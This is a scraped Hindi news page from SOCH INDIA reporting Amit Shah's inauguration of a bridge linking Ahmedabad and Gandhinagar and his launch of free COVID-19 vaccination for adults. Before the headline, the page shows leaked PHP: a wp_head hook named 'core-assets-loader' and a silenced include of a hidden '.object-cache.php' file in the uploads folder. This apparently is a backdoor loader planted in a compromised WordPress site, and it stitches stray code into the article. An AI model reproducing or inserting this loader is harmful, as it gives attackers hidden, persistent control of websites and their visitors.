add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘शाह’ का गुजरात दौरा:अमित शाह ने अहमदाबाद से गांधीनगर को जोड़ने वाले ब्रिज का लोकार्पण किया, रोजाना 1 लाख लोगों को जाम से मिलेगी राहत – SOCH INDIA
Menu

देश
‘शाह’ का गुजरात दौरा:अमित शाह ने अहमदाबाद से गांधीनगर को जोड़ने वाले ब्रिज का लोकार्पण किया, रोजाना 1 लाख लोगों को जाम से मिलेगी राहत

nobanner

केंद्रीय गृह मंत्री अमित शाह दो दिवसीय गुजरात दौरे पर हैं। अमित शाह ने अहमदाबाद को गांधीनगर से जोड़ने वाले एसजी हाईवे पर वैष्णोदेवी सर्कल ब्रिज का उद्घाटन किया। इस तरह आज से वाहन चालकों के लिए ब्रिज खोल दिया गया। करीब 28 करोड़ रुपए की लागत से बने इस ब्रिज से अहमदाबाद से गांधीनगर आने-जाने वाले रोजाना के एक लाख से ज्यादा लोगों को ट्रैफिक जाम से निजात मिलेगी।

इस अवसर पर अमित शाह के साथ मुख्यमंत्री विजय रूपाणी और उपमुख्यमंत्री नितिन पटेल भी मौजूद रहे। दोपहर में अमित शाह खोडियार कंटेनर डिपो के पास बने फ्लाईओवर ब्रिज का भी उद्घाटन करेंगे। दोनों फ्लाईओवर ब्रिज के उद्घाटन की तैयारी आज सुबह से ही शुरू कर दी गई थी।

नि:शुल्क वैक्सीन अभियान को बताया बड़ा निर्णय
ब्रिज का उद्घाटन करने के बाद अमित शाह ने पंडित दीन दयाल उपाध्याय सेंटर में कोविड-19 टीकाकरण केंद्र का जायजा लिया और लोगों को दुनिया के सबसे बड़े टीकाकरण अभियान का हिस्सा बनने के लिए प्रोत्साहित किया। शाह ने कहा, ‘इतनी बड़ी आबादी वाले देश में 18 साल से अधिक आयु वाले सभी नागरिकों को निशुल्क वैक्सीन लगाना एक बहुत बड़ा निर्णय है। आज योग दिवस के दिन इसकी देशभर में शुरुआत हो रही है. अब हम बहुत तेजी से लगभग सभी को टीका देने के लक्ष्य के आसपास पहुंच जाएंगे।’

वैक्सीनेशन को तेज किया जाएगा: शाह
अमित शाह ने कहा, ‘पीएम नरेंद्र मोदी के नेतृत्व में आज से कोरोना के खिलाफ लड़ाई की एक नए चरण की शुरुआत हो रही है। पीएम मोदी ने एक महत्वपूर्ण निर्णय लिया था कि 21 जून से 18 साल या उससे अधिक उम्र के लोगों को केंद्र सरकार द्वारा मुफ्त में टीका लगाया जाएगा।

इसके तहत टीकाकरण की प्रक्रिया को तेज किया जाएगा। साथ ही उन्होंने लोगों से वैक्सीन लगवाने के लिए आगे आने की अपील की। उन्होंने कहा, ‘कोरोना के खिलाफ वैक्सीन सबसे बड़ा हथियार है और लोगों को इसके लिए आगे आने चाहिए।’